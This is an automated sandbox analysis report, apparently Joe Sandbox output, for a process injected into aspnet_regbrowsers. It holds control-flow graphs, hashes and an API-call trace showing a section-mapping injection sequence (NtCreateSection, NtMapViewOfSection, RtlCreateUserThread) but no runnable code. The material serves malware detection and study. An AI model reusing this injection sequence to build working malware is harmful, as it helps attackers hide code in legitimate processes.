                                                                                                                          • Source File: 0000000A.00000002.1698925490.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_b0d000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2e9c2a69a0262aadb2473f5fb61d3d9f942b5d6f7b1df63e82bbe88bd7875f52
                                                                                                                          • Instruction ID: e59d012fcdd88075494b560f26b7af1dfddab46701fa906bb74c2f99f125bc87
                                                                                                                          • Opcode Fuzzy Hash: 2e9c2a69a0262aadb2473f5fb61d3d9f942b5d6f7b1df63e82bbe88bd7875f52
                                                                                                                          • Instruction Fuzzy Hash: 0001F7715053409FE7204E51CCC0766BFD8EF42324F28C49AED4D0B1C2D2799881CAB1

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:7.9%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:57.1%
                                                                                                                          Total number of Nodes:56
                                                                                                                          Total number of Limit Nodes:2
                                                                                                                          execution_graph 2226 402d65 2227 402d69 2226->2227 2228 4018a6 8 API calls 2227->2228 2229 402ea5 2227->2229 2228->2229 2304 4018b1 2305 401903 2304->2305 2307 4018b5 2304->2307 2306 4014bf 7 API calls 2305->2306 2309 40191a 2305->2309 2306->2309 2308 4018ee Sleep 2307->2308 2308->2305 2250 4014d6 2251 4014c4 2250->2251 2252 40156f NtDuplicateObject 2251->2252 2261 40168b 2251->2261 2253 40158c NtCreateSection 2252->2253 2252->2261 2254 4015b2 NtMapViewOfSection 2253->2254 2255 40160c NtCreateSection 2253->2255 2254->2255 2256 4015d5 NtMapViewOfSection 2254->2256 2257 401638 2255->2257 2255->2261 2256->2255 2258 4015f3 2256->2258 2259 401642 NtMapViewOfSection 2257->2259 2257->2261 2258->2255 2260 401669 NtMapViewOfSection 2259->2260 2259->2261 2260->2261 2222 402f5d 2223 4030b4 2222->2223 2224 402f87 2222->2224 2224->2223 2225 403042 RtlCreateUserThread NtTerminateProcess 2224->2225 2225->2223 2196 402dfe 2199 402dee 2196->2199 2197 402ea5 2199->2197 2200 4018a6 2199->2200 2201 4018b7 2200->2201 2202 4018ee Sleep 2201->2202 2203 401903 2202->2203 2205 40191a 2203->2205 2206 4014bf 2203->2206 2205->2197 2207 4014ce 2206->2207 2208 40156f NtDuplicateObject 2207->2208 2217 40168b 2207->2217 2209 40158c NtCreateSection 2208->2209 2208->2217 2210 4015b2 NtMapViewOfSection 2209->2210 2211 40160c NtCreateSection 2209->2211 2210->2211 2212 4015d5 NtMapViewOfSection 2210->2212 2213 401638 2211->2213 2211->2217 2212->2211 2214 4015f3 2212->2214 2215 401642 NtMapViewOfSection 2213->2215 2213->2217 2214->2211 2216 401669 NtMapViewOfSection 2215->2216 2215->2217 2216->2217 2217->2205 2310 4018be 2311 4018b7 2310->2311 2312 4018ee Sleep 2311->2312 2313 401903 2312->2313 2314 4014bf 7 API calls 2313->2314 2315 40191a 2313->2315 2314->2315 2218 4030bf 2219 403055 RtlCreateUserThread NtTerminateProcess 2218->2219 2221 4030d1 2218->2221 2220 4030b4 2219->2220 2221->2221

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 20 401540-401569 16->20 21 40184b 16->21 17->14 22 40185a-401883 17->22 20->21 31 40156f-401586 NtDuplicateObject 20->31 21->22 29 401874-40187f 22->29 30 401886-4018a3 call 401164 22->30 29->30 31->21 32 40158c-4015b0 NtCreateSection 31->32 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->21 38 401638-40163c 35->38 37->35 41 4015f3-401609 37->41 38->21 42 401642-401663 NtMapViewOfSection 38->42 41->35 42->21 43 401669-401685 NtMapViewOfSection 42->43 43->21 45 40168b call 401690 43->45
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$CreateDuplicateObjectView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1652636561-0
                                                                                                                          • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                          • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                                                                                                          • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                                                                                          • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 67 401540-401569 63->67 68 40184b 63->68 64->61 69 40185a-401883 64->69 67->68 78 40156f-401586 NtDuplicateObject 67->78 68->69 76 401874-40187f 69->76 77 401886-4018a3 call 401164 69->77 76->77 78->68 79 40158c-4015b0 NtCreateSection 78->79 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->68 85 401638-40163c 82->85 84->82 88 4015f3-401609 84->88 85->68 89 401642-401663 NtMapViewOfSection 85->89 88->82 89->68 90 401669-401685 NtMapViewOfSection 89->90 90->68 92 40168b call 401690 90->92
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                          • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                                                                                                          • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                                                                                          • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 110 401540-401569 106->110 111 40184b 106->111 107->104 112 40185a-401883 107->112 110->111 121 40156f-401586 NtDuplicateObject 110->121 111->112 119 401874-40187f 112->119 120 401886-4018a3 call 401164 112->120 119->120 121->111 122 40158c-4015b0 NtCreateSection 121->122 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->111 128 401638-40163c 125->128 127->125 131 4015f3-401609 127->131 128->111 132 401642-401663 NtMapViewOfSection 128->132 131->125 132->111 133 401669-401685 NtMapViewOfSection 132->133 133->111 135 40168b call 401690 133->135
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                          • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                                                                                                          • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                          • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 150 401540-401569 146->150 151 40184b 146->151 147->144 152 40185a-401883 147->152 150->151 161 40156f-401586 NtDuplicateObject 150->161 151->152 159 401874-40187f 152->159 160 401886-4018a3 call 401164 152->160 159->160 161->151 162 40158c-4015b0 NtCreateSection 161->162 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->151 168 401638-40163c 165->168 167->165 171 4015f3-401609 167->171 168->151 172 401642-401663 NtMapViewOfSection 168->172 171->165 172->151 173 401669-401685 NtMapViewOfSection 172->173 173->151 175 40168b call 401690 173->175
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                          • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                                                                                                          • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                          • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 178 402f5d-402f81 179 4030b4-4030b9 178->179 180 402f87-402f9f 178->180 180->179 181 402fa5-402fb6 180->181 182 402fb8-402fc1 181->182 183 402fc6-402fd4 182->183 183->183 184 402fd6-402fdd 183->184 185 402fff-403006 184->185 186 402fdf-402ffe 184->186 187 403028-40302b 185->187 188 403008-403027 185->188 186->185 189 403034 187->189 190 40302d-403030 187->190 188->187 189->182 192 403036-40303b 189->192 190->189 191 403032 190->191 191->192 192->179 193 40303d-403040 192->193 193->179 194 403042-4030b1 RtlCreateUserThread NtTerminateProcess 193->194 194->179
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcessTerminateThreadUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1921587553-0
                                                                                                                          • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                          • Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
                                                                                                                          • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                          • Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 195 4030bf-4030cf 196 4030d1-403109 195->196 197 403055-4030b1 RtlCreateUserThread NtTerminateProcess 195->197 201 403113-403118 196->201 202 40310b 196->202 198 4030b4-4030b9 197->198 203 40311a 201->203 204 40311f-403141 call 4011db 201->204 202->201 205 40310d-403110 202->205 203->204 206 40311c 203->206 211 403145 204->211 205->201 206->204 211->211
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcessTerminateThreadUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1921587553-0
                                                                                                                          • Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                          • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                                                                                          • Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                          • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 212 4018c5-40190b call 401164 Sleep call 4013cc 222 40191a-401920 212->222 223 40190d-401915 call 4014bf 212->223 226 401931 222->226 227 401928-40192d 222->227 223->222 226->227 228 401934-40194f 226->228 227->228 233 401952-40195b call 401164 228->233 234 401948-40194b 228->234 234->233
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                            • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                            • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID: zOji
                                                                                                                          • API String ID: 4152845823-4118548424
                                                                                                                          • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                          • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                                                                                                          • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                          • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 237 4018a6-4018c3 241 4018d4 237->241 242 4018c8-40190b call 401164 Sleep call 4013cc 237->242 241->242 252 40191a-401920 242->252 253 40190d-401915 call 4014bf 242->253 256 401931 252->256 257 401928-40192d 252->257 253->252 256->257 258 401934-40194f 256->258 257->258 263 401952-40195b call 401164 258->263 264 401948-40194b 258->264 264->263
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                            • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                            • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                          • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                                                                                                          • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                          • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 267 4018be-4018c3 271 4018d4 267->271 272 4018c8-40190b call 401164 Sleep call 4013cc 267->272 271->272 282 40191a-401920 272->282 283 40190d-401915 call 4014bf 272->283 286 401931 282->286 287 401928-40192d 282->287 283->282 286->287 288 401934-40194f 286->288 287->288 293 401952-40195b call 401164 288->293 294 401948-40194b 288->294 294->293
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                            • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                            • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                          • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                                                                                                          • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                          • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 297 4018b1-4018b3 298 401903-40190b call 4013cc 297->298 299 4018b5-4018c3 297->299 305 40191a-401920 298->305 306 40190d-401915 call 4014bf 298->306 303 4018d4 299->303 304 4018c8-401900 call 401164 Sleep 299->304 303->304 304->298 312 401931 305->312 313 401928-40192d 305->313 306->305 312->313 315 401934-40194f 312->315 313->315 322 401952-40195b call 401164 315->322 323 401948-40194b 315->323 323->322
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3472027048-0
                                                                                                                          • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                          • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                                                                                                          • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                          • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 326 4018c2-40190b call 401164 Sleep call 4013cc 338 40191a-401920 326->338 339 40190d-401915 call 4014bf 326->339 342 401931 338->342 343 401928-40192d 338->343 339->338 342->343 344 401934-40194f 342->344 343->344 349 401952-40195b call 401164 344->349 350 401948-40194b 344->350 350->349
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                            • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                            • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                          • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                                                                                          • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                          • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 353 4018da-40190b call 401164 Sleep call 4013cc 360 40191a-401920 353->360 361 40190d-401915 call 4014bf 353->361 364 401931 360->364 365 401928-40192d 360->365 361->360 364->365 366 401934-40194f 364->366 365->366 371 401952-40195b call 401164 366->371 372 401948-40194b 366->372 372->371
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                            • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                            • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                          • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                                                                                                          • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                          • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                          • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                                                                                                          • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                          • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                          • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                                                                                                          • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                          • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                                                                                                          Memory Dump Source
